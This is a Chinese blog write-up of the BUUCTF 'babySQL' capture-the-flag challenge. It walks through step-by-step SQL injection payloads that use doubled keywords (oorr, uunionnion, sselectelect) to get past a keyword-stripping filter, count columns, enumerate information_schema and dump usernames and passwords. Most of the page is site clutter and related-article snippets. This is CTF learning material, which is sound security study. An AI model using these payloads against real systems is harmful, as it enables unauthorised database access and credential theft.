buuctf babySQL

最新推荐文章于 2024-06-13 09:00:30 发布
最新推荐文章于 2024-06-13 09:00:30 发布
阅读量64 收藏
点赞数
文章标签: servlet 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_74020399/article/details/130039660
版权

打开题目发现和之前作的界面类似

尝试万能密码登入

在这里插入图片描述

 输入一些常用的注入语句发现报错的都为输入的部分,说明没报错的语句没了或者被替换成了无效语句,这里考滤一下replace函数

username尝试输入1'%23(就是1'#的意思)

发现1‘#回显为1'%23即1’#可以使用只是前面有什么使后面的语句失效,大胆猜测是将前面的关键语句替换成空尝试输入1‘or 1=1;发现任然报错,但当输入1' oorr 1=1时发现登入成功

(这里是利用双写绕过replace函数的替换)

 

之后进行测试发现replace了or,from,where,select,and,by,union 

代换上面函数进行爆表:

?username=admin' oorrder bbyy 3;%23&password=1

显示登陆成功

 将3换为4显示登陆失败即一共有三列

再进行爆列:

?username=1' uunionnion sselectelect 1,2,3;%23&password=1

显示回显在2,3列

继续进行爆破:

?username=1' uunionnion sselectelect 1,2,group_concat(table_name) ffromrom infoorrmation_schema.tables wwherehere table_schema=database()%23&password=1


?username=1' uunionnion sselectelect 1,2,group_concat(column_name) ffromrom infoorrmation_schema.columns wwherehere table_schema=database() aandnd table_name='b4bsql' %23&password=1

 

将第三列也爆出来:

?username=1' uunionnion sselectelect 1,2,group_concat(id,username,passwoorrd) ffromrom b4bsql %23&password=1

 便可以发现flag在第三列中

 

 

梅琳娜等等我
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BUUCTF逆向前八题
01-24
内容为BUUCTF里reserve的前八题自己的一些解题思路
BasicASM.s(BUUCTF
06-04
分析过程文件
[极客大挑战 2019]BabySQL
qq_53689523的博客
02-20 116
根据’134’,我们知道后端使用单引号闭合,而且我们更加确定后端sql语句是。这里提示报错时,我们发现我们输入的and和or都没了,猜测后端应该时匹配到and和or以后,就把他们删除了,所以我们采用双关键词绕过,构造包如下。发现返回三个值时,会显示登录成功,其余情况都显示下标不对,所以应该返回三个值,而且,如果语句正确,会返回登录成功,否则会返回报错。所以,做到这里,我们就知道本题是一道 双关键词过滤的sql注类题目。我们再加长一下条件,测试一下是否过滤了某些关键词。获取每个表的字段中的数据。
buuctf Babysql
zzqzzq11的博客
08-06 232
buuctf
buuctf BabySQL+HardSQL
硫酸超的博客
11-20 3768
cbuuctf BabySQL 1、进入登录页面 2、随便输入 发现用户名和密码错误 3、尝试判断是否为字符型注入 根据报错,确定为单引号字符型注入,密码处也尝试了一下,发现也是单引号字符型注入,说明有2处注入漏洞 4、尝试万能密码 1’ or 1=1-- 发现or被过滤了 尝试双写or 成功绕过 这里说下双写or为什么可以绕过 因为这个网页只对or进行一次过滤,即将字符串中的or替换为空,但是我们可以双写or去绕过,我们也可以用||去代替or 但是发现这个密码并没有用 5、测试有哪些关键字
buuctf-BabySQL
m0_62094846的博客
11-11 341
可以看到or不见了,再联系网页中所说进行过滤,可能是过滤掉了一些注入语句的关键词,但是到底过滤了哪些是个问题 过滤掉了or 和by 用oorrder bbyy,就可以在系统过滤后得到order by 有3段数据 接下来查数据库 系统又过滤了union select from被过滤了,注意information的or也是被过滤的 接下来查表,先试试ctf where也被过滤了 后面查不出结果,到时候再试试 看wp,把字段放在密码后面 ...
BUUCTFBabySQL[极客大挑战 2019]
金 帛的博客
06-11 434
BUUCTF记录贴
BUUCTF [极客大挑战 2019]BabySQL
m0_49025459的博客
05-15 561
打开环境看看,这一个登录界面 尝试万能密码无果,那么我们只能正常尝试注入,先判断列数 1' order by 1# 输入之后发生报错 发现这里or被过滤掉了 ,这里不论是大写还是小写的or都被过滤了,但是在尝试双写绕过的时候成功了 username:admin' oorr '1'='1# password:123 这样我们就可以尝试又多少列了,但是我们在尝试的时候发现order,or,by都被过滤掉了,所以我们只能通过其他的方式进行测试。但是我们在测试的时候发现union,sel
BUUCTF [极客大挑战 2019] BabySQL
Senimo
03-25 3793
BUUCTF [极客大挑战 2019] BabySQL 启动靶机,打开环境: 尝试登陆: 因为前两次的题目BUUCTF 极客大挑战 2019 EasySQL和均用万能密码登陆成功,再次尝试: /check.php ?username=admin' or '1'='1 &password=1 登陆失败,尝试注释掉password内容: /check.php ?username=adm...
BUUCTF Web [极客大挑战 2019]BabySQL
网安小趴菜
08-31 412
BUUCTF Web [极客大挑战 2019]BabySQL
BUUCTF之[极客大挑战 2019]BabySQL 解决方法
weixin_44632787的博客
06-17 1874
BUUCTF之[极客大挑战 2019]BabySQL 解决方法 启动我们的挑战项目 emmmmm这是第三个SQL注入,应该难度又提高了一些。先试试我们的万能密码:1’ or 1=1 # 不行,报错了。而且我也看不出报错的信息是什么 然后返回前面的题目看看提示信息,觉得可能这题是加了一些过滤信息 所以我们试试双写看看能不能绕过防御,并且把最后面的 # 号改成 %23。 所以我们的payload为:1’ oorr 1=1 %23 发现可以获取到信息,说明我们这个方法是正确的! 然后我们再进行用ord
BUUCTF部分web题目
05-06
写题记录
BUUCTF】MISC zip
01-20
import zipfile import string import binascii def CrackCrc(crc): for i in dic: for j in dic: for p in dic: for q in dic: s = i + j + p + q if crc == (binascii.crc32(s.encode())): ...
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
04-09
BUUCTF题目(含工具),你竟然赶我走、乌镇峰会种图、你竟然赶我走、大白、(超级详细)“小白”入坑CTF,先入手杂项部分
【redis的基本数据类型】
最新发布
m0_50116974的博客
06-13 593
压缩列表的基本信息包括压缩列表的大小,压缩列表的长度以及最后一个entry的偏移,之所以要有这个偏移,是为了找到最后一个entry,而每个entry都记录上一个元素的大小,通过计算就知道上一个entry的地址,这样方便的从后向前进行遍历。的结构,其分为两部分,8字节的Redis对象元数据信息,8字节的指针,其中Redis对象的元数据信息存储了类型的LRU信息,真正的编码格式等等,而如果字符串存储的是数字类型,则复用了8字节的指针的位置。的操作,但是当列表的元素非常少的时候,其内部使用。
canal应用
qq_33816292的博客
06-12 165
canal分享模块链接。
【pytest】parametrize获取参数的几种常用形式
weixin_40482973的博客
06-12 341
【代码】【pytest】parametrize获取参数的几种常用形式。
源码编译安装LAMP
潇的博客
06-12 919
LAMP 架构是目前成熟的企业网站应用模式之一,指的是协同工作的一整套系统和相关软件,能够提供动态Web站点服务及其应用开发环境。LAMP是一个缩写词,具体包括Linux操作系统、Apache网站服务器、MySQL数据库服务器、PHP(或Perl、Python)网页编程语言。本章将以源码编译的方式搭建LAMP环境,能够满足企业定制化的需求。在构建LAMP平台时,各组件的安装顺序依次为Linux、Apache、MySQL、PHP。其中Apache和MySQL的安装并没有严格的顺序;
buuctf wireshark
09-12
根据您提供的引用内容,buuctf wireshark 是一个与buuctf比赛相关的题目。其中,Wireshark 是一个网络封包分析软件,可以用来捕获和分析网络数据包。根据[1]中提供的下载地址,可以下载 Wireshark 软件进行使用。 在buuctf wireshark题目中,黑客通过使用Wireshark抓到了管理员登陆网站时的一段流量包,并将其中的密码作为flag。解题思路是使用Wireshark打开下载的文件,然后根据题目提示,在流量包中找到管理员登陆网站时的请求,该请求方式为POST类型,可以通过过滤条件 `http.request.method==POST` 来筛选出该请求。在该请求中,可以找到管理员的密码,作为flag提交。 不过,需要注意的是,获取到的flag需要加上 `flag{}` 并进行提交。 此外,根据中的提到的方法,您也可以直接将下载的图片文件扔到WinHex中进行查看,以便寻找是否存在flag。但是,请注意在buuctf wireshark题目中的具体解题思路仍然是通过Wireshark分析流量包。 总结起来,对于buuctf wireshark题目,您需要下载Wireshark软件,打开下载的文件,并根据题目提示找到管理员登陆网站时的流量包,从中获取管理员的密码作为flag,最后在提交flag时记得加上 `flag{}`。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值